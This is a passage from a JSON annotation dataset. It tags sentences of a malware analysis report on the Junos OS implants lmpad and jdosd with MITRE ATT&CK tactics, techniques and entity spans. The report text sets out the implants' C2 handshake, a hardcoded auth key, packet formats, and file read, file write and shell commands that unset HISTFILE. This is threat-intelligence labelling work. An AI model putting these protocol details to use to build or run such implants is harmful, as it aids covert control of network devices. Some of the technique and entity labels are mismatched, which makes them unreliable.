commit is made on the device to avoid detection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p8-s160-141460", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 160, "context_before": "The assumption is that this is done after a malicious commit is made on the device to avoid detection.", "sentence_text": "All Other Commands: Restart Listening For all other values of the command packet except the ones mentioned above, the lmpad breaks out of the C2 loop and starts back up from the top.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" }, { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Restart C2 listening loop for unrecognized commands", "entities": [ { "text": "lmpad", "start": 118, "end": 123, "label": "MalwareTool" }, { "text": "breaks out of the C2 loop", "start": 124, "end": 149, "label": "Action" }, { "text": "starts back up from the top.", "start": 154, "end": 182, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p8-s161-c7a744", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 161, "context_before": "All Other Commands: Restart Listening For all other values of the command packet except the ones mentioned above, the lmpad breaks out of the C2 loop and starts back up from the top.", "sentence_text": "Command and Control Protocol Diagram", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p8-s162-907f84", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 162, "context_before": "Command and Control Protocol Diagram", "sentence_text": "The lmpad C2 protocol is described below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p8-s163-3b3767", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 163, "context_before": "The lmpad C2 protocol is described below.", "sentence_text": "The diagram omits some details about the individual command protocols described above.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p8-s164-19488b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 8, "sentence_id": 164, "context_before": "The diagram omits some details about the individual command protocols described above.", "sentence_text": "However, it is a high-level summary of how the C2 is authenticated and the command mode is entered.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p9-s165-d54ef6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 9, "sentence_id": 165, "context_before": "However, it is a high-level summary of how the C2 is authenticated and the command mode is entered.", "sentence_text": "Call Graphs\nDue to the way in which the lmpad is programmed, only two symbols seem to be used.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p9-s166-b11cbb", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 9, "sentence_id": 166, "context_before": "Call Graphs\nDue to the way in which the lmpad is programmed, only two symbols seem to be used.", "sentence_text": "These are encrypt_and_send and receive_and_decrypt.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Uses encrypt_and_send and receive_and_decrypt for C2 communications", "entities": [ { "text": "encrypt_and_send ", "start": 10, "end": 27, "label": "Infrastructure_Indicator" }, { "text": "receive_and_decrypt.", "start": 31, "end": 51, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p9-s167-a8401e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 9, "sentence_id": 167, "context_before": "These are encrypt_and_send and receive_and_decrypt.", "sentence_text": "All the other functionality of this implant is written in static functions (or macros) and therefore the decompilation did not produce any functions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p9-s168-5df1cd", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 9, "sentence_id": 168, "context_before": "All the other functionality of this implant is written in static functions (or macros) and therefore the decompilation did not produce any functions.", "sentence_text": "Junos OS Specific Actions The lmpad seems to be an implant specifically designed for Junos OS.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1608.001", "name": "Upload Malware" } ], "procedure": "lmpad implant specifically designed for Junos OS", "entities": [ { "text": "lmpad ", "start": 30, "end": 36, "label": "MalwareTool" }, { "text": "implant", "start": 51, "end": 58, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p9-s169-6063b2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 9, "sentence_id": 169, "context_before": "Junos OS Specific Actions The lmpad seems to be an implant specifically designed for Junos OS.", "sentence_text": "The files which are affected by the embedded shell script in its post-exploit and pre-exploit modes are logs which are highly specific to Junos OS.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p9-s170-78efa2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 9, "sentence_id": 170, "context_before": "The files which are affected by the embedded shell script in its post-exploit and pre-exploit modes are logs which are highly specific to Junos OS.", "sentence_text": "There seems to be no Junos OS specific behavior that is unique to jdosd.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p9-s171-174e59", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 9, "sentence_id": 171, "context_before": "There seems to be no Junos OS specific behavior that is unique to jdosd.", "sentence_text": "This section will explain the general behavior of jdosd.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p9-s172-dc4a8f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 9, "sentence_id": 172, "context_before": "This section will explain the general behavior of jdosd.", "sentence_text": "Executable File Details Title Description File Name jdosd File Path /usr/bin/jdosd File Type jdosd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Deployment of jdosd executable to /usr/bin/", "entities": [ { "text": " /usr/bin/jdosd ", "start": 67, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "FreeBSD 6.4", "start": 219, "end": 230, "label": "Infrastructure_Indicator" }, { "text": "ELF 32-bit LSB executable,", "start": 100, "end": 126, "label": "Infrastructure_Indicator" }, { "text": " jdosd ", "start": 51, "end": 58, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p10-s173-2aba9a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 173, "context_before": "Executable File Details Title Description File Name jdosd File Path /usr/bin/jdosd File Type jdosd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped", "sentence_text": "File Size 18156 bytes SHA1 Hash 06a1f879da398c00522649171526dc968f769093 SHA256", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "jdosd malware file with hash identifiers", "entities": [ { "text": "SHA1 Hash 06a1f879da398c00522649171526dc968f769093 SHA256", "start": 22, "end": 79, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p10-s174-56323a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 174, "context_before": "File Size 18156 bytes SHA1 Hash 06a1f879da398c00522649171526dc968f769093 SHA256", "sentence_text": "Hash c0ec15e08b4fb3730c5695fb7b4a6b85f7fe341282ad469e4e141c40ead310c3 ssdeep hash 384:Cwuax3lMjKozXsIi7+sC3eqSlG1j/lzDMV1qNZhXY+IxLHQ+a:Z36jRzXRi78jSqzhX1IxLu Implant Analysis The jdosd starts up a UDP socket at port 33512 on the target device and listens for incoming connections.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "jdosd starts UDP socket at port 33512 and listens for connections", "entities": [ { "text": "Hash c0ec15e08b4fb3730c5695fb7b4a6b85f7fe341282ad469e4e141c40ead310c3", "start": 0, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "UDP socket at port 33512", "start": 198, "end": 222, "label": "Infrastructure_Indicator" }, { "text": "Implant", "start": 159, "end": 166, "label": "MalwareTool" }, { "text": "jdosd", "start": 180, "end": 185, "label": "MalwareTool" }, { "text": "hash 384:Cwuax3lMjKozXsIi7+sC3eqSlG1j/lzDMV1qNZhXY+IxLHQ+a:Z36jRzXRi78jSqzhX1IxLu ", "start": 77, "end": 159, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p10-s175-4f3cdd", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 175, "context_before": "Hash c0ec15e08b4fb3730c5695fb7b4a6b85f7fe341282ad469e4e141c40ead310c3 ssdeep hash 384:Cwuax3lMjKozXsIi7+sC3eqSlG1j/lzDMV1qNZhXY+IxLHQ+a:Z36jRzXRi78jSqzhX1IxLu Implant Analysis The jdosd starts up a UDP socket at port 33512 on the target device and listens for incoming connections.", "sentence_text": "The address for the jdosd server is determined based on the interface stored in the eth environment variable.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" }, { "id": "T1608.001", "name": "Upload Malware" } ], "procedure": "jdosd server address determined by eth environment variable", "entities": [ { "text": "jdosd server ", "start": 20, "end": 33, "label": "MalwareTool" }, { "text": "eth environment variable.", "start": 84, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "address for the", "start": 4, "end": 19, "label": "Action" }, { "text": "based on the interface", "start": 47, "end": 69, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p10-s176-06169c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 176, "context_before": "The address for the jdosd server is determined based on the interface stored in the eth environment variable.", "sentence_text": "It first authenticates the server by receiving an 'encrypted' hello message from the server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Authenticates server via encrypted hello message", "entities": [ { "text": "authenticates the server", "start": 9, "end": 33, "label": "Action" }, { "text": "receiving an 'encrypted' hello message ", "start": 37, "end": 76, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p10-s177-40ecd4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 177, "context_before": "It first authenticates the server by receiving an 'encrypted' hello message from the server.", "sentence_text": "Once the server is authenticated, a similar client hello message is sent and the response from the server is checked to ensure that the client message sent was the same as the message received from the server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Mutual authentication via client-server hello exchange with message verification", "entities": [ { "text": " client hello message is sen", "start": 43, "end": 71, "label": "Action" }, { "text": "client hello message", "start": 44, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "response from the server is checked", "start": 81, "end": 116, "label": "Action" }, { "text": "ensure that the client message sent was the same as the message received", "start": 120, "end": 192, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p10-s178-43706a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 178, "context_before": "Once the server is authenticated, a similar client hello message is sent and the response from the server is checked to ensure that the client message sent was the same as the message received from the server.", "sentence_text": "Once the initial message exchange succeeds, the jdosd is ready to receive commands from the C2 server.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" }, { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Ready to receive commands from C2 server after authentication", "entities": [ { "text": "jdosd", "start": 48, "end": 53, "label": "MalwareTool" }, { "text": "ready to receive commands", "start": 57, "end": 82, "label": "Action" }, { "text": "C2 server", "start": 92, "end": 101, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p10-s179-38d299", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 179, "context_before": "Once the initial message exchange succeeds, the jdosd is ready to receive commands from the C2 server.", "sentence_text": "Artifacts Found\nArtifact Name Description", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p10-s180-298b6c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 180, "context_before": "Artifacts Found\nArtifact Name Description", "sentence_text": "AUTH Key A hardcoded AUTH key was found at offset 0x2a3c in the jdosd binary with value 4fd37426-65dd-4a8d-8ba6-1382a011dae9 Message Format The message exchange is encoded using the AUTH key shown above using a custom cipher which can be understood from the custom_cipher() function.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Uses hardcoded AUTH key and custom cipher for C2 communication", "entities": [ { "text": " jdosd binary", "start": 63, "end": 76, "label": "MalwareTool" }, { "text": "offset 0x2a3c", "start": 43, "end": 56, "label": "Infrastructure_Indicator" }, { "text": "4fd37426-65dd-4a8d-8ba6-1382a011dae9", "start": 88, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "encoded using the AUTH key", "start": 164, "end": 190, "label": "Action" }, { "text": "using a custom cipher", "start": 203, "end": 224, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p10-s181-adf74e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 181, "context_before": "AUTH Key A hardcoded AUTH key was found at offset 0x2a3c in the jdosd binary with value 4fd37426-65dd-4a8d-8ba6-1382a011dae9 Message Format The message exchange is encoded using the AUTH key shown above using a custom cipher which can be understood from the custom_cipher() function.", "sentence_text": "The messages shown below are the decrypted messages.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p10-s182-06b7a6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 182, "context_before": "The messages shown below are the decrypted messages.", "sentence_text": "The rest of the message is the payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p10-s183-2c538c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 183, "context_before": "The rest of the message is the payload.", "sentence_text": "Field Header Payload Value \"deadbeef\" + Non-negative value ${PAYLOAD} Client Message Client messages contain a 16-byte header with the string \"deadbeef\" concatenated with the client’s process ID (8 bytes).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Uses custom message format with header 'deadbeef' and process ID", "entities": [ { "text": "process ID (8 bytes)", "start": 184, "end": 204, "label": "Infrastructure_Indicator" }, { "text": "16-byte header ", "start": 111, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "Header Payload Value \"deadbeef\"", "start": 6, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "Client messages contain ", "start": 85, "end": 109, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p10-s184-74dff2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 184, "context_before": "Field Header Payload Value \"deadbeef\" + Non-negative value ${PAYLOAD} Client Message Client messages contain a 16-byte header with the string \"deadbeef\" concatenated with the client’s process ID (8 bytes).", "sentence_text": "The rest of the message is the payload.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p10-s185-395900", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 185, "context_before": "The rest of the message is the payload.", "sentence_text": "Field Header Payload Value \"deadbeef\" + Own Process ID in hex ${PAYLOAD} Command Details Multiple different command packets are described in this section.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Uses custom message format with header 'deadbeef' and own process ID", "entities": [ { "text": "Header Payload Value \"deadbeef\"", "start": 6, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "Own Process ID in hex ", "start": 40, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "Multiple different command packets", "start": 89, "end": 123, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p10-s186-a2c456", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 186, "context_before": "Field Header Payload Value \"deadbeef\" + Own Process ID in hex ${PAYLOAD} Command Details Multiple different command packets are described in this section.", "sentence_text": "These packets contain the same header as the client/server hello packets, followed by a command in the form of an integer.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p10-s187-a38b27", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 187, "context_before": "These packets contain the same header as the client/server hello packets, followed by a command in the form of an integer.", "sentence_text": "The command packet contains the command as the first byte.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p10-s188-12db39", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 188, "context_before": "The command packet contains the command as the first byte.", "sentence_text": "Command 1: Read a File The command 0x01 is used by the implant to enter the file reading routine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p10-s189-574d80", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 10, "sentence_id": 189, "context_before": "Command 1: Read a File The command 0x01 is used by the implant to enter the file reading routine.", "sentence_text": "The file is read as follows:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p11-s190-ce2d0c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 190, "context_before": "The file is read as follows:", "sentence_text": "1. Read the name of the file to be read from the socket.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p11-s191-010c0c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 191, "context_before": "1. Read the name of the file to be read from the socket.", "sentence_text": "2. Open the file and read 1008 bytes at a time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p11-s192-6031c6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 192, "context_before": "2. Open the file and read 1008 bytes at a time.", "sentence_text": "3. Send the number of bytes read over the socket in a packet containing the client hello header.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p11-s193-19fc4c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 193, "context_before": "3. Send the number of bytes read over the socket in a packet containing the client hello header.", "sentence_text": "Repeat 2 and 3 until the read fails.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p11-s194-c3f3b6", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 194, "context_before": "Repeat 2 and 3 until the read fails.", "sentence_text": "5. Send the string \"over\" over the socket and exit.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p11-s195-51e654", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 195, "context_before": "5. Send the string \"over\" over the socket and exit.", "sentence_text": "The command 1 packet format can be seen below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p11-s196-c9261a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 196, "context_before": "The command 1 packet format can be seen below.", "sentence_text": "Packet Format\nField Header Payload Value \"deadbeef\" + Non-negative value \\x01 Command 2: Write a File The command 0x02 is used by the implant to enter the file writing routine.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" }, { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Write file using command 0x02", "entities": [ { "text": "implant", "start": 134, "end": 141, "label": "Infrastructure_Indicator" }, { "text": "command 0x02 ", "start": 106, "end": 119, "label": "Infrastructure_Indicator" }, { "text": "Header Payload", "start": 20, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "enter the file writing routine.", "start": 145, "end": 176, "label": "Action" }, { "text": "Write a File", "start": 89, "end": 101, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p11-s197-e9d502", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 197, "context_before": "Packet Format\nField Header Payload Value \"deadbeef\" + Non-negative value \\x01 Command 2: Write a File The command 0x02 is used by the implant to enter the file writing routine.", "sentence_text": "The file is written as follows:\n1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p11-s198-329bbe", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 198, "context_before": "The file is written as follows:\n1.", "sentence_text": "Read the name of the file to be written from the socket.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Read filename from socket for file writing", "entities": [ { "text": "Read the name of the file to be written", "start": 0, "end": 39, "label": "Action" }, { "text": "from the socket.", "start": 40, "end": 56, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p11-s199-ec7b3c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 199, "context_before": "Read the name of the file to be written from the socket.", "sentence_text": "2. Open the file using creat(2).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Open file using creat(2) system call", "entities": [ { "text": "Open the file using", "start": 3, "end": 22, "label": "Action" }, { "text": "creat(2).", "start": 23, "end": 32, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p11-s200-ece261", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 200, "context_before": "2. Open the file using creat(2).", "sentence_text": "3. Read the contents of the file to be written from the socket.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Read file contents from socket for writing", "entities": [ { "text": "from the socket.", "start": 47, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "Read the contents of the file to be written", "start": 3, "end": 46, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p11-s201-955eba", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 201, "context_before": "3. Read the contents of the file to be written from the socket.", "sentence_text": "If the string \"over\" is read from the socket, close the file and return.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Close file upon receiving 'over' signal from socket", "entities": [ { "text": "close the file and return.", "start": 46, "end": 72, "label": "Action" }, { "text": "string \"over\"", "start": 7, "end": 20, "label": "Infrastructure_Indicator" }, { "text": "from the socket", "start": 29, "end": 44, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p11-s202-fffdb9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 202, "context_before": "If the string \"over\" is read from the socket, close the file and return.", "sentence_text": "The command 2 packet format can be seen below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p11-s203-90ab22", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 203, "context_before": "The command 2 packet format can be seen below.", "sentence_text": "Packet Format\nField Header Payload Value \"deadbeef\" + Non-negative value \\x02", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Command 0x02 packet format with header 'deadbeef", "entities": [ { "text": "Header Payload", "start": 20, "end": 34, "label": "MalwareTool" }, { "text": "\\x02", "start": 73, "end": 77, "label": "MalwareTool" }, { "text": "Payload Value", "start": 27, "end": 40, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p11-s204-52c256", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 204, "context_before": "Packet Format\nField Header Payload Value \"deadbeef\" + Non-negative value \\x02", "sentence_text": "Command 3: Start a Shell", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Start shell via command 0x03", "entities": [ { "text": "Command 3", "start": 0, "end": 9, "label": "Infrastructure_Indicator" }, { "text": "Start a Shell", "start": 11, "end": 24, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p11-s205-2acdae", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 205, "context_before": "Command 3: Start a Shell", "sentence_text": "The command 0x03 is used by the implant to open up a /bin/csh shell on the target device.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Open /bin/csh shell on target device", "entities": [ { "text": "open", "start": 43, "end": 47, "label": "Action" }, { "text": "/bin/csh shell ", "start": 53, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "command 0x03", "start": 4, "end": 16, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p11-s206-7780f3", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 206, "context_before": "The command 0x03 is used by the implant to open up a /bin/csh shell on the target device.", "sentence_text": "The environment variable HISTFILE is first unset.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Unset HISTFILE environment variable", "entities": [ { "text": "HISTFILE is first unset.", "start": 25, "end": 49, "label": "Action" }, { "text": "environment variable HISTFILE", "start": 4, "end": 33, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p11-s207-55538a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 207, "context_before": "The environment variable HISTFILE is first unset.", "sentence_text": "Then the environment variable TERM is set to a value provided by the C2.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Set TERM environment variable from C2", "entities": [ { "text": "TERM is set ", "start": 30, "end": 42, "label": "Action" }, { "text": "environment variable TERM", "start": 9, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "value provided by the C2.", "start": 47, "end": 72, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p11-s208-86f0a1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 208, "context_before": "Then the environment variable TERM is set to a value provided by the C2.", "sentence_text": "Then the command /bin/sh -c /bin/csh is executed on the device.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Execute /bin/sh -c /bin/csh command", "entities": [ { "text": "/bin/sh -c /bin/csh ", "start": 17, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "command", "start": 9, "end": 16, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p11-s209-3bd855", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 11, "sentence_id": 209, "context_before": "Then the command /bin/sh -c /bin/csh is executed on the device.", "sentence_text": "The command 3 packet format can be seen below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p12-s210-3b3489", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 12, "sentence_id": 210, "context_before": "The command 3 packet format can be seen below.", "sentence_text": "Packet Format\nField Header Payload Value \"deadbeef\" + Non-negative value \\x03 Command 255: Exit On receiving the command 0xff, the command processing routine returns to the main loop.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" } ], "procedure": "Exit command processing on receiving 0xff", "entities": [ { "text": "command 0xff", "start": 113, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "Header Payload Value \"deadbeef\"", "start": 20, "end": 51, "label": "Infrastructure_Indicator" }, { "text": "command processing routine returns to the main loop.", "start": 131, "end": 183, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p12-s211-c6384e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 12, "sentence_id": 211, "context_before": "Packet Format\nField Header Payload Value \"deadbeef\" + Non-negative value \\x03 Command 255: Exit On receiving the command 0xff, the command processing routine returns to the main loop.", "sentence_text": "The exit packet format is given below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p12-s212-22b595", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 12, "sentence_id": 212, "context_before": "The exit packet format is given below.", "sentence_text": "Packet Format\nField Header Payload Value \"deadbeef\" + Non-negative value \\xff Call Graphs The various call graphs for the jdosd implant are given below.\nget_server_hello()", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Exit packet format with header 'deadbeef' 